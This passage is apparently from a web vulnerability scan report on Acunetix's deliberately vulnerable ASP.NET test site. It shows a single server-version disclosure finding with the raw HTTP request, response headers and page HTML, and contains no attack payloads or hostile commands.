bGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi/TB7mR4IysbuEg0lOgmHIs" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:24 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a 